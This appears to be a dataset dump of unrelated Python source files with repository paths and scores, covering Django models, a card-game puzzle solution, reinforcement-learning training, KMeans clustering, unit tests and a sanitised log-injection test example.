{% if this.projection %}.projection({{this.projection}}){% endif %}
{% if this.colors %}.colors({{this.colors}}){% endif %}
{% if this.order %}.ordering(function (d) {
var out = null;
var order={{this.order}};
for (var j=0;j<order.length;j++) {
if (order[j]==d.key) {out = 1+j;}
}
return out;}){% endif %};
d3.selectAll('#{{this.get_name()}}-reset').on('click',function () {
{{this.get_name()}}.chart.filterAll();
dc.redrawAll();
});
{% endmacro %}
""")
| 2.03125 | 2 |
src/order/models.py | xistadi/BookStore | 0 | 12786535 | from django.db import models
from cart import models as cart_models
from django.db.models.signals import post_save
from django.dispatch import receiver
class Order(models.Model):
cart = models.OneToOneField(
cart_models.Cart,
related_name='order',
on_delete=models.PROTECT
)
delivery_status_choices = (('1', 'В процессе оформления'), ('2', 'На рассмотрении модерации'), ('3', 'Отменен'),
('4', 'Заказан'), ('5', 'Доставка'), ('6', 'Доставлен'))
delivery_status = models.CharField(
verbose_name='Статус заказа',
default=1,
max_length=20,
choices=delivery_status_choices
)
comment = models.TextField(
verbose_name='Комментарий',
blank=True,
null=True
)
type_of_payment = models.CharField(
verbose_name='Тип оплаты',
default=1,
max_length=20
)
date_add = models.DateTimeField(
auto_now=False,
auto_now_add=True,
verbose_name='Дата создания заказа'
)
date_last_change = models.DateTimeField(
auto_now=True,
auto_now_add=False,
verbose_name='Дата последнего изменения заказа'
)
def __str__(self):
return f'Заказ №{self.pk}, статус заказа: {self.get_delivery_status_display()}.'
class Meta:
verbose_name = 'Заказ'
verbose_name_plural = 'Заказы'
class AddressInOrder(models.Model):
order = models.ForeignKey(
Order,
on_delete=models.PROTECT,
related_name='address_in_order'
)
country = models.CharField(
'Страна',
max_length=20,
blank=True,
null=True
)
city = models.CharField(
'Город',
max_length=20,
blank=True,
null=True
)
index = models.CharField(
'Индекс',
max_length=15,
blank=True,
null=True
)
address1 = models.CharField(
'Адрес1',
max_length=50,
blank=True,
null=True
)
address2 = models.CharField(
'Адрес2',
max_length=50,
blank=True,
null=True
)
def __str__(self):
return f'Профиль адрес в заказе №{self.pk}.'
class Meta:
verbose_name = 'Профиль адрес в заказе'
verbose_name_plural = 'Профиль адреса в заказах'
| 2.046875 | 2 |
2020/day_22/one.py | zigapk/adventofcode | 0 | 12786536 | from collections import deque
q1 = deque()
q2 = deque()
player_2 = False
with open('in', 'r') as f:
f.readline()
for line in f.readlines():
try:
i = int(line.strip())
if player_2:
q2.append(i)
else:
q1.append(i)
except Exception:
player_2 = True
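# Play the "Combat" card game: each round both players draw their top card and
# the player with the higher card puts both cards at the bottom of their deck,
# winning card first.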
while len(q1) > 0 and len(q2) > 0:
card1 = q1.popleft()
card2 = q2.popleft()
if card1 > card2:
q1.append(max(card1, card2))
q1.append(min(card1, card2))
else:
q2.append(max(card1, card2))
q2.append(min(card1, card2))
q = q1 if len(q2) == 0 else q2
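# Score the winning deck: the bottom card counts once, the next card twice, ...,
# the top card len(q) times.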
result = 0
for i in range(1, len(q) + 1):
result += i * q.pop()
print(result)
| 3.0625 | 3 |
tests/test_main/main_weather_data.py | zahraghh/Two-Stage-Stochastic-Programming | 3 | 12786537 | <gh_stars>1-10
import os
import sys
import pandas as pd
import csv
from Two_Stage_SP import download_windsolar_data, GTI,uncertainty_analysis
if __name__ == "__main__":
#Reading the data from the Weather Data Analysis section of the editable_values.csv
editable_data_path =os.path.join(sys.path[0], 'editable_values.csv')
editable_data = pd.read_csv(editable_data_path, header=None, index_col=0, squeeze=True).to_dict()[1]
city_DES =str(editable_data['city'])
#Downloading the weather data from NSRDB
download_windsolar_data.download_meta_data(city_DES)
#Calculating the global tilted irradiance on a surface in the City
GTI.GTI_results(city_DES)
#Calculating the distribution of global tilted irradiance (might take ~5 mins)
uncertainty_analysis.probability_distribution('GTI',46) #Name and the column number in the weather data
    #Calculating the distribution of wind speed (might take ~5 mins)
uncertainty_analysis.probability_distribution('wind_speed',8) #Name and the column number in the weather data
| 2.765625 | 3 |
tests/test_ast.py | keith/xcode-ast-dump | 80 | 12786538 | <gh_stars>10-100
import ast
import unittest
RAW_ARGUMENTS = open("tests/arguments.txt").read().strip().split()
class TestAST(unittest.TestCase):
def test_removes_emits(self):
_, other_arguments = ast.build_parser().parse_known_args(RAW_ARGUMENTS)
for argument in other_arguments:
self.assertNotIn("emit", argument)
def test_adds_dump(self):
command = ast.ast_command("", [])
self.assertIn("-dump-ast", command)
def test_starts_with_swiftc_argument(self):
command = ast.ast_command("swiftc_arg", [])
self.assertEqual(command[0], "swiftc_arg")
def test_ends_with_other_arguments(self):
command = ast.ast_command("", ["foobar"])
self.assertEqual(command[2], "foobar")
def test_swiftc_executable_path(self):
environment = {"DEVELOPER_DIR": "/foo", "TOOLCHAINS": "com.bar"}
swiftc = ast.swiftc_executable(environment)
self.assertEqual(swiftc,
"/foo/Toolchains/bar.xctoolchain/usr/bin/swiftc")
def test_swiftc_executable_path_override(self):
environment = {"DEVELOPER_DIR": "/foo", "TOOLCHAINS": "com.bar",
"AST_SWIFTC": "bar"}
swiftc = ast.swiftc_executable(environment)
self.assertEqual(swiftc, "bar")
def test_swift_executable_without_xcode(self):
swiftc = ast.swiftc_executable({"AST_SWIFTC": "baz"})
self.assertEqual(swiftc, "baz")
def test_swift_executable_no_environ(self):
swiftc = ast.swiftc_executable({})
self.assertEqual(swiftc, "swiftc")
def test_is_in_xcode(self):
self.assertTrue(ast.is_in_xcode({"TOOLCHAINS": "is_set"}))
def test_is_not_in_xcode(self):
self.assertFalse(ast.is_in_xcode({}))
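# Running these tests (illustrative; assumes execution from the repository root so that
# tests/arguments.txt resolves):
#   python -m unittest tests.test_ast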
| 2.75 | 3 |
django_test/articles/migrations/0004_auto_20200306_1921.py | MachineLearningIsEasy/python_lesson_22 | 1 | 12786539 | <gh_stars>1-10
# Generated by Django 3.0.3 on 2020-03-06 19:21
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0003_auto_20200306_1817'),
]
operations = [
migrations.AlterField(
model_name='article',
name='article_date',
field=models.DateTimeField(default=datetime.datetime(2020, 3, 6, 19, 21, 22, 43613)),
),
migrations.AlterField(
model_name='article',
name='article_name',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='article',
name='article_tag',
field=models.ManyToManyField(to='articles.Tag'),
),
migrations.AlterField(
model_name='article',
name='article_text',
field=models.CharField(blank=True, max_length=1000, null=True),
),
]
| 1.617188 | 2 |
tests/python/pants_test/rules/test_run.py | SergeKireev/pants | 0 | 12786540 | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.build_graph.address import Address, BuildFileAddress
from pants.engine.addressable import BuildFileAddresses
from pants.engine.fs import Digest, FileContent, InputFilesContent, Workspace
from pants.engine.interactive_runner import InteractiveRunner
from pants.rules.core import run
from pants.rules.core.binary import CreatedBinary
from pants.testutil.console_rule_test_base import ConsoleRuleTestBase
from pants.testutil.engine.util import MockConsole, run_rule
class RunTest(ConsoleRuleTestBase):
goal_cls = run.Run
def create_mock_binary(self, program_text: bytes) -> CreatedBinary:
input_files_content = InputFilesContent((
FileContent(path='program.py', content=program_text, is_executable=True),
))
digest, = self.scheduler.product_request(Digest, [input_files_content])
return CreatedBinary(
binary_name='program.py',
digest=digest,
)
def single_target_run(self, *, console: MockConsole, program_text: bytes, spec: str):
workspace = Workspace(self.scheduler)
interactive_runner = InteractiveRunner(self.scheduler)
address = Address.parse(spec)
bfa = BuildFileAddress(
build_file=None,
target_name=address.target_name,
rel_path=f'{address.spec_path}/BUILD'
)
build_file_addresses = BuildFileAddresses((bfa,))
res = run_rule(run.run, console, workspace, interactive_runner, build_file_addresses, {
(CreatedBinary, Address): lambda _: self.create_mock_binary(program_text)
})
return res
def test_normal_run(self) -> None:
console = MockConsole(use_colors=False)
program_text = b'#!/usr/bin/python\nprint("hello")'
res = self.single_target_run(
console=console,
program_text=program_text,
spec='some/addr'
)
self.assertEqual(res.exit_code, 0)
self.assertEqual(console.stdout.getvalue(), "Running target: some/addr:addr\nsome/addr:addr ran successfully.\n")
self.assertEqual(console.stderr.getvalue(), "")
def test_failed_run(self) -> None:
console = MockConsole(use_colors=False)
program_text = b'#!/usr/bin/python\nraise RuntimeError("foo")'
res = self.single_target_run(
console=console,
program_text=program_text,
spec='some/addr'
)
self.assertEqual(res.exit_code, 1)
self.assertEqual(console.stdout.getvalue(), "Running target: some/addr:addr\n")
self.assertEqual(console.stderr.getvalue(), "some/addr:addr failed with code 1!\n")
| 2.0625 | 2 |
supervised/preprocessing/preprocessing_exclude_missing.py | michaelneale/mljar-supervised | 1 | 12786541 | <gh_stars>1-10
import os
import json
import numpy as np
import pandas as pd
import logging
log = logging.getLogger(__name__)
class PreprocessingExcludeMissingValues(object):
@staticmethod
def remove_rows_without_target(data):
if "train" in data:
X_train = data.get("train").get("X")
y_train = data.get("train").get("y")
X_train, y_train = PreprocessingExcludeMissingValues.transform(
X_train, y_train
)
data["train"]["X"] = X_train
data["train"]["y"] = y_train
if "validation" in data:
X_validation = data.get("validation").get("X")
y_validation = data.get("validation").get("y")
X_validation, y_validation = PreprocessingExcludeMissingValues.transform(
X_validation, y_validation
)
data["validation"]["X"] = X_validation
data["validation"]["y"] = y_validation
return data
@staticmethod
def transform(X=None, y=None):
log.debug("Exclude rows with missing target values")
if y is None:
return X, y
y_missing = pd.isnull(y)
if np.sum(np.array(y_missing)) == 0:
return X, y
y = y.drop(y.index[y_missing])
y.index = range(y.shape[0])
if X is not None:
X = X.drop(X.index[y_missing])
X.index = range(X.shape[0])
return X, y
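# Minimal usage sketch (added for illustration, not part of the original module):
# rows whose target value is missing are dropped from both X and y, and indices reset.
if __name__ == "__main__":
    X_demo = pd.DataFrame({"feature": [1.0, 2.0, 3.0]})
    y_demo = pd.Series([0.5, np.nan, 1.5])
    X_clean, y_clean = PreprocessingExcludeMissingValues.transform(X_demo, y_demo)
    print(X_clean.shape, list(y_clean))  # expected: (2, 1) [0.5, 1.5]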
| 2.734375 | 3 |
app/stories/admin.py | Sherba/AdventureReader | 0 | 12786542 | <reponame>Sherba/AdventureReader<gh_stars>0
from django.contrib import admin
from .models import Genre, Node, Post
admin.site.register(Genre)
admin.site.register(Node)
admin.site.register(Post)
| 1.210938 | 1 |
main.py | samuelmat19/DDPG-tf2 | 11 | 12786543 | """
Main file
"""
import argparse
import logging
import random
import gym
from tqdm import trange
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
from common_definitions import CHECKPOINTS_PATH, TOTAL_EPISODES, TF_LOG_DIR, UNBALANCE_P
from model import Brain
from utils import Tensorboard
if __name__ == "__main__":
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
parser = argparse.ArgumentParser(
prog="Deep Deterministic Policy Gradient (DDPG)",
description="Deep Deterministic Policy Gradient (DDPG) in Tensorflow 2"
)
parser.add_argument('--env', type=str, nargs='?',
default="BipedalWalker-v3",
help='The OpenAI Gym environment to train on, '
'e.g. BipedalWalker-v3, LunarLanderContinuous-v2,'
' Pendulum-v0')
parser.add_argument('--render_env', type=bool, nargs='?', default=True,
help='Render the environment to be visually visible')
parser.add_argument('--train', type=bool, nargs='?', default=True,
help='Train the network on the modified DDPG algorithm')
parser.add_argument('--use_noise', type=bool, nargs='?', default=True,
help='OU Noise will be applied to the policy action')
parser.add_argument('--eps_greedy', type=float, nargs='?', default=0.95,
help="The epsilon for Epsilon-greedy in the policy's action")
parser.add_argument('--warm_up', type=int, nargs='?', default=1,
help='Following recommendation from OpenAI Spinning Up, the actions in the '
'early epochs can be set random to increase exploration. This warm up '
'defines how many epochs are initially set to do this.')
parser.add_argument('--save_weights', type=bool, nargs='?', default=True,
help='Save the weight of the network in the defined checkpoint file '
'directory.')
args = parser.parse_args()
RL_TASK = args.env
RENDER_ENV = args.render_env
LEARN = args.train
USE_NOISE = args.use_noise
WARM_UP = args.warm_up
SAVE_WEIGHTS = args.save_weights
EPS_GREEDY = args.eps_greedy
# Step 1. create the gym environment
env = gym.make(RL_TASK)
action_space_high = env.action_space.high[0]
action_space_low = env.action_space.low[0]
brain = Brain(env.observation_space.shape[0], env.action_space.shape[0], action_space_high,
action_space_low)
tensorboard = Tensorboard(log_dir=TF_LOG_DIR)
# load weights if available
logging.info("Loading weights from %s*, make sure the folder exists", CHECKPOINTS_PATH)
brain.load_weights(CHECKPOINTS_PATH)
# all the metrics
acc_reward = tf.keras.metrics.Sum('reward', dtype=tf.float32)
actions_squared = tf.keras.metrics.Mean('actions', dtype=tf.float32)
Q_loss = tf.keras.metrics.Mean('Q_loss', dtype=tf.float32)
A_loss = tf.keras.metrics.Mean('A_loss', dtype=tf.float32)
# To store reward history of each episode
ep_reward_list = []
# To store average reward history of last few episodes
avg_reward_list = []
# run iteration
with trange(TOTAL_EPISODES) as t:
for ep in t:
prev_state = env.reset()
acc_reward.reset_states()
actions_squared.reset_states()
Q_loss.reset_states()
A_loss.reset_states()
brain.noise.reset()
for _ in range(2000):
if RENDER_ENV: # render the environment into GUI
env.render()
# Receive state and reward from environment.
cur_act = brain.act(tf.expand_dims(prev_state, 0), _notrandom=(ep >= WARM_UP) and
(random.random() < EPS_GREEDY+(1-EPS_GREEDY)*ep/TOTAL_EPISODES),
noise=USE_NOISE)
state, reward, done, _ = env.step(cur_act)
brain.remember(prev_state, reward, state, int(done))
# update weights
if LEARN:
c, a = brain.learn(brain.buffer.get_batch(unbalance_p=UNBALANCE_P))
Q_loss(c)
A_loss(a)
# post update for next step
acc_reward(reward)
actions_squared(np.square(cur_act/action_space_high))
prev_state = state
if done:
break
ep_reward_list.append(acc_reward.result().numpy())
# Mean of last 40 episodes
avg_reward = np.mean(ep_reward_list[-40:])
avg_reward_list.append(avg_reward)
# print the average reward
t.set_postfix(r=avg_reward)
tensorboard(ep, acc_reward, actions_squared, Q_loss, A_loss)
# save weights
if ep % 5 == 0 and SAVE_WEIGHTS:
brain.save_weights(CHECKPOINTS_PATH)
env.close()
brain.save_weights(CHECKPOINTS_PATH)
logging.info("Training done...")
# Plotting graph
# Episodes versus Avg. Rewards
plt.plot(avg_reward_list)
plt.xlabel("Episode")
plt.ylabel("Avg. Epsiodic Reward")
plt.show()
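# Example invocation (illustrative; flags correspond to the argparse options above):
#   python main.py --env LunarLanderContinuous-v2 --render_env True --train True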
| 2.46875 | 2 |
python/ql/test/experimental/query-tests/Security/CWE-117/LogInjectionGood.py | madhurimamandal/codeql | 4,036 | 12786544 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
@Desc :Log Injection
"""
from flask import Flask
from flask import request
import logging
logging.basicConfig(level=logging.DEBUG)
app = Flask(__name__)
@app.route('/good1')
def good1():
name = request.args.get('name')
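# Stripping CR/LF below ensures user-controlled input cannot forge extra log lines.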
name = name.replace('\r\n','').replace('\n','')
logging.info('User name: ' + name) # Good
return 'good1'
if __name__ == '__main__':
app.debug = True
handler = logging.FileHandler('log')
app.logger.addHandler(handler)
app.run()
| 2.65625 | 3 |
HW10_K-means/misc.py | 824zzy/CSE-6363_MACHINE-LEARNING | 0 | 12786545 | <filename>HW10_K-means/misc.py<gh_stars>0
import matplotlib.pyplot as plt
import numpy as np
from scipy.spatial.distance import cdist
class KMeans(object):
def __init__(self, n_clusters):
self.n_clusters = n_clusters
def fit(self, X, iter_max=100):
all_centers = []
I = np.eye(self.n_clusters)
centers = X[np.random.choice(len(X), self.n_clusters, replace=False)]
for _ in range(iter_max):
prev_centers = np.copy(centers)
D = cdist(X, centers)
cluster_index = np.argmin(D, axis=1)
cluster_index = I[cluster_index]
centers = np.sum(X[:, None, :] * cluster_index[:, :, None], axis=0) / np.sum(cluster_index, axis=0)[:, None]
all_centers.append(centers)
if np.allclose(prev_centers, centers):
break
self.centers = centers
return all_centers
def predict(self, X):
D = cdist(X, self.centers)
return np.argmin(D, axis=1)
| 2.75 | 3 |
24_astro/astro.py | Tjorriemorrie/trading | 2 | 12786546 | import flatlib
from flatlib.chart import Chart
from flatlib.datetime import Datetime
from flatlib.geopos import GeoPos
def generate_data():
date = Datetime('2015/01/13', '17:00', '+10:00')
print(date)
pos = GeoPos('38n32', '8w54')
print(pos)
chart = Chart(date, pos)
print(chart)
if __name__ == '__main__':
generate_data()
| 2.9375 | 3 |
x_rebirth_station_calculator/station_data/wares/v_launcher.py | Phipsz/XRebirthStationCalculator | 1 | 12786547 | <filename>x_rebirth_station_calculator/station_data/wares/v_launcher.py<gh_stars>1-10
from x_rebirth_station_calculator.station_data.station_base import Ware
names = {'L044': 'V Launcher',
'L049': 'V-Starter'}
VLauncher = Ware(names)
| 1.375 | 1 |
modeltranslation_wrapper/models.py | zlorf/django-modeltranslation-wrapper | 1 | 12786548 | <reponame>zlorf/django-modeltranslation-wrapper
from django.conf import settings
try:
from modeltranslation import autodiscover
# direct patch will not be possible.
# one needs to set 'modeltranslation_wrapper.patch' at the end of MODELTRANSLATION_TRANSLATION_FILES
except ImportError:
# modeltranslation < 0.4, so use the translation autodiscover
settings.MODELTRANSLATION_TRANSLATION_FILES = list(
getattr(settings, 'MODELTRANSLATION_TRANSLATION_FILES', ()))
if getattr(settings, 'MODELTRANSLATION_TRANSLATION_REGISTRY', None):
settings.MODELTRANSLATION_TRANSLATION_FILES.append(settings.MODELTRANSLATION_TRANSLATION_REGISTRY)
if 'modeltranslation_wrapper.patch' in settings.MODELTRANSLATION_TRANSLATION_FILES:
settings.MODELTRANSLATION_TRANSLATION_FILES.remove('modeltranslation_wrapper.patch')
settings.MODELTRANSLATION_TRANSLATION_FILES.append('modeltranslation_wrapper.patch')
settings.MODELTRANSLATION_TRANSLATION_REGISTRY = 'modeltranslation_wrapper.translation_autodiscover'
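# Illustrative settings fragment (module names other than the patch are hypothetical):
# for modeltranslation >= 0.4, list the wrapper patch last so it is applied after the
# project's own translation files, e.g.
#   MODELTRANSLATION_TRANSLATION_FILES = [
#       'myapp.translation',
#       'modeltranslation_wrapper.patch',
#   ]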
| 1.492188 | 1 |
setup.py | degibbons/Tilibot | 0 | 12786549 | #!/usr/bin/env python
from distutils.core import setup
setup(name='Tilibot',
version='1.0', # Fix
description='Tiliqua Biomechanics Emulation',
author='<NAME>',
author_email='<EMAIL>',
packages=['distutils', 'distutils.command'], # Fix
) | 1.007813 | 1 |
Lib/site-packages/fidget/backend/Resources.py | fochoao/cpython | 1 | 12786550 | from fidget.backend.QtGui import QIcon
# noinspection PyUnresolvedReferences
import fidget.backend._resources
class LazyIcon:
def __init__(self, path):
self.path = path
self._instance = None
def __call__(self, *args, **kwargs):
if not self._instance:
self._instance = QIcon(self.path)
return self._instance
add_col_left_icon = LazyIcon(':fidget/feather/corner-left-down.svg')
add_col_right_icon = LazyIcon(':fidget/feather/corner-right-down.svg')
add_row_above_icon = LazyIcon(':fidget/feather/corner-up-right.svg')
add_row_below_icon = LazyIcon(':fidget/feather/corner-down-right.svg')
del_col_icon = LazyIcon(':fidget/feather/delete.svg')
del_row_icon = del_col_icon
error_icon = LazyIcon(':fidget/feather/alert-triangle.svg')
ok_icon = LazyIcon(':fidget/feather/check.svg')
| 2.109375 | 2 |